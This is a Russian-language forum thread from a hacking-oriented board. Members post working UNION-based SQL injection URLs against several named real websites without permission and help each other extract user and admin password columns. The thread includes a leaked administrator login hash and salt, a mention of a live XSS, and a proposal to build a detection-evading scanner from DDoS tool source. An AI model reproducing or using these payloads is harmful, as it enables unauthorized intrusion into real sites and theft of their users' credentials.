Понедельник, 23.10.2017, 23:51 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 212»
Модератор форума: xXxSh@dowxXx 
delfcode » Обсуждения » Безопасность » Sql инъекция (Не получается разрулить скулю))))
Sql инъекция
NeoДата: Пятница, 26.10.2012, 05:36 | Сообщение # 1
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Вот случайно нашёл сайт с уязвимостью sql inj.Вот прочитал тазвание таблицы с юзерами,а вот строки таблице почему-то не выводятся.Может кто знает как их прочитать.
Code

http://www.uniscan.by/articles.php?id=9999+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x616d635f7573657273--

Вот так должны прочитаться user_password из amc_users.
Code

http://www.uniscan.by/articles.php?id=9999+union+select+1,user_password,3,4,5++from+amc_users

Но почему-то вылазит ошибка Error in getting 1 article! sad


Сообщение отредактировал Neo - Пятница, 26.10.2012, 05:40
 
antbertДата: Пятница, 26.10.2012, 07:57 | Сообщение # 2
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
Скорее всего стоят какие-то фильтры.
 
antbertДата: Пятница, 26.10.2012, 08:00 | Сообщение # 3
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
http://www.uniscan.by/news.php?id= тут blind sql
можешь попробовать ее крутануть
 
xXxSh@dowxXxДата: Пятница, 26.10.2012, 10:06 | Сообщение # 4
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
посканив чуть чуть данный сайт, удалось выципить только 2 уязвимости, вот тут например у них XSS:



а раскручиваемая SQL у них вот тут:



правильно antbert сказал...

и вот вам в дополнение один из админов которого смог найти:



PS: Ха, забавно простой скрипт в споилере работает и на нашем сайте ппц ребят исправьте пожалуйста а то активная уязвимость получается.... wacko
скрипт в споилере с XSS подпортил так как получается бяка..., но я думаю не сложно догадаться что там исправить...


Сообщение отредактировал xXxSh@dowxXx - Пятница, 26.10.2012, 10:19
 
NeoДата: Пятница, 26.10.2012, 12:07 | Сообщение # 5
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Да,xss - ка то тут активная!!!А кстати где на том сайте админка?

Сообщение отредактировал Neo - Пятница, 26.10.2012, 12:30
 
antbertДата: Пятница, 26.10.2012, 14:25 | Сообщение # 6
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
Улыбает - http://www.uniscan.by/test.php
Админку не нашел я, видимо засунули куда-то, либо вообще плодят всю информацию в ручную, юзая б.д, что дико.
Учитывая .by хочу спросить - случайно не из Белоруссии ?
 
xXxSh@dowxXxДата: Пятница, 26.10.2012, 15:25 | Сообщение # 7
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (antbert)


да действительно забавно)))

Quote (antbert)
Админку не нашел


такая же ситуация...
 
C@TДата: Воскресенье, 28.10.2012, 02:56 | Сообщение # 8
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Quote (xXxSh@dowxXx)
а раскручиваемая SQL у них вот тут:

они обе раскручиваются просто имя бд указывать нужно, ибо первый запрос идет к базе данных "new"
http://www.uniscan.by/article...._users#

Quote (xXxSh@dowxXx)
login,password=admin^240894816f4597f69cbb4bfd29b071cf

забыл указать что там еще и salt есть = 6c0
 
NeoДата: Воскресенье, 28.10.2012, 10:46 | Сообщение # 9
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Quote (C@T)
просто имя бд указывать нужно,

А можно по-подробнее.Вроде же имя и так указываем.И что-такое uniscanby? smile :) smile
Почему [url=http://www.uniscan.by/articles.phpid=9999+union+select+1,user_password,3,4,5+from+uniscanby.amc_users#]здесь[/url] надо писать uniscanby. ,а
[url=http://www.uniscan.by/articles.php?id=9999+union+select+1,salt,3,4,password+from+admin#]здесь [/url]
и так всё нормально?


Сообщение отредактировал Neo - Воскресенье, 28.10.2012, 10:52
 
C@TДата: Воскресенье, 28.10.2012, 12:44 | Сообщение # 10
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
ибо первый запросс идет в бд с именем new , если написать , поэтому для бд "new" указывать бд не нужно, uniscanby это база данных
посмотреть в какой базе данных какая таблица можно тут http://www.uniscan.by/news.ph....tables#
 
NeoДата: Четверг, 03.01.2013, 06:44 | Сообщение # 11
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Вот вчера нашёл ещё одну скулю smile
Но опять не получается разрулить её.
Код

http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,table_name,3,4+from+information_Schema.Tables--

Думаю,что читать нужно таблицу site_users.Вот как читаю:
Код

http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,column_name,3,4+from+information_Schema.columns+where+table_name=0x736974655f7573657273--

Отображается user_Name,user_Mail,user_Password
Пробую это прочитать так:
Код

http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,user_Password,database(),4+from+magazine_forum.site_users--

Но,увы выводится вот что:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/magazine/data/www/forum.magazine-rest.in.ua/data/stil.php on line 80
Как же всё-таки прочитать лакомый колонки? wink
 
C@TДата: Пятница, 04.01.2013, 16:49 | Сообщение # 12
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,TABLE_SCHEMA,3,4+from+information_Schema.tables+where+table_name=0x736974655f7573657273--


2 раза на теже грабли, ошибка в имени базы данных smile

Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,user_Password,database(),4+from+magazine_restinua.site_users--


Код
http://www.forum.magazine-rest.in.ua/t.php?id=999+union+select+1,user_Password,user_Mail,user_Name+from+magazine_restinua.site_users--


P.S
функция database() возвращает имя текущей бд, а точнее имя бд в которой находится текущая таблица(та таблица к которой относится первый SELECT)


 
NeoДата: Суббота, 05.01.2013, 10:14 | Сообщение # 13
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Спасиба C@T, .Вот ещё нашёл что,там вообще странно
http://www.kez-himmash.ru/content.php?id=-9+union+select+1,2#
 
NeoДата: Суббота, 05.01.2013, 10:29 | Сообщение # 14
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Вот ещё нашёл,но там ограмная куча таблиц,где трудно найти админку или что-то нужное)))
http://www.ruspolygraf.ru/index.p....ables--
P.S давайте сюда выкладывать найденные скули или xss wink .
 
xXxSh@dowxXxДата: Суббота, 05.01.2013, 16:29 | Сообщение # 15
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата (Neo)
P.S давайте сюда выкладывать найденные скули или xss

Хотел бы уточнить, если Вы находите что то на популярном ресурсе, просьба не выкладывать сюда полную информацию по найденной уязвимости, в дальнейшем можно было бы создать тему в закрытом разделе для таких находок, а впрочем пускай наша администрация решит как лучше поступить в такой ситуации?!


Сообщение отредактировал xXxSh@dowxXx - Суббота, 05.01.2013, 16:32
 
C@TДата: Понедельник, 07.01.2013, 22:45 | Сообщение # 16
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Цитата (Neo)
http://www.kez-himmash.ru/content.php?id=-9+union+select+1,2#


тут сразу не видно smile



Прикрепления: 8865270.png(315Kb) · 7466912.png(278Kb)


 
C@TДата: Понедельник, 07.01.2013, 22:48 | Сообщение # 17
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
а давайте напишем свой сканер уязвимостей на сайтах ? smile

P.S язык программирования можно и делфи, тут главное алгоритм работы smile
P.P.S если идея нравится то можно создать новую тему и выкладывать туда идеи, наработки smile


 
xXxSh@dowxXxДата: Вторник, 08.01.2013, 14:28 | Сообщение # 18
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата (C@T)
а давайте напишем свой сканер уязвимостей на сайтах

большой проект, много работы, куча алгоритмов, если уж и браться за это, то нужно не мало умов специализирующихся по поиску.


Сообщение отредактировал xXxSh@dowxXx - Вторник, 08.01.2013, 14:29
 
C@TДата: Вторник, 08.01.2013, 17:51 | Сообщение # 19
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Цитата (xXxSh@dowxXx)
большой проект, много работы, куча алгоритмов, если уж и браться за это, то нужно не мало умов специализирующихся по поиску.

потихоньку скриптики писать, почему бы и нет, главное начать smile


 
antbertДата: Вторник, 08.01.2013, 18:35 | Сообщение # 20
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
Свой писать смысла не имеет, это тонны кода, существуют хорошие, платные реверснутые аналоги, просто с огромнейшим функционалом.
Разумеется я не беру в расчет самообразование.


Сообщение отредактировал antbert - Вторник, 08.01.2013, 18:36
 
xXxSh@dowxXxДата: Вторник, 08.01.2013, 18:56 | Сообщение # 21
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Цитата (antbert)
Разумеется я не беру в расчет самообразование

Вот вот, а мы исключительно в целях самообразования! wink
 
Don_DiegoДата: Вторник, 08.01.2013, 21:47 | Сообщение # 22
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 251
Статус: Offline
Цитата (C@T)
а давайте напишем свой сканер уязвимостей на сайтах ?

Цитата (xXxSh@dowxXx)
большой проект, много работы, куча алгоритмов, если уж и браться за это, то нужно не мало умов специализирующихся по поиску.

Потихоньку можно. Можно даже внести свою изюминку - воспользоваться GLScene и создать полноценный 3D интерфейс для такой проги, будет как в фильмах про хакеров cool Такого точно еще нигде не встречал.
Цитата (antbert)
существуют хорошие, платные реверснутые аналоги

А тут можно создать бесплатный, дескать для рекламы ресурса. Самообразование тоже не помешает.
 
C@TДата: Среда, 09.01.2013, 00:58 | Сообщение # 23
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Цитата (antbert)
Свой писать смысла не имеет, это тонны кода, существуют хорошие, платные реверснутые аналоги, просто с огромнейшим функционалом.
Разумеется я не беру в расчет самообразование.

в том то и дело что у них слишком огромный функционал, у меня например никогда не хватало терпения дождатся полного скана акунетиксом biggrin

ну а так полезно может быть иметь подобный сканер, можно сделать расширенную настройку, или даже модульную систему, для добавления новых уязвимостей

P.S на вопрос так и не ответили, будем делать или нет ? (я за). ну и если будем то на каком языке, я голосую за php, ибо крос платформенно и подобное писать удобней на пхп, ну и для тех кто его не знает не составит труда его выучить smile


 
antbertДата: Среда, 09.01.2013, 01:03 | Сообщение # 24
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
Ок, в этом случае за основу предлагаю взять сорцы хорошего php one-ip ддосера, может у кого есть в запасниках, я свои чистил?
На вопрос: "Зачем?" постараюсь сразу ответить. Проблема того же акунетикса в том, что его скан можно засечь и блокировать, нужна очень хорошая рандомизация.
ps: Кто-нибудь разбирается в печенько-уязвимостях? Не видел еще нормальной реализации нигде.


Сообщение отредактировал antbert - Среда, 09.01.2013, 01:03
 
xXxSh@dowxXxДата: Среда, 09.01.2013, 02:36 | Сообщение # 25
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
я всегда за нормальный проект и хорошую идею wink
а на счет того что можно присечь скан то это логично, ведь там куча запросов в многопоточном режиме и с одного ip это прекрасно видно.
 
delfcode » Обсуждения » Безопасность » Sql инъекция (Не получается разрулить скулю))))
Страница 1 из 212»
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz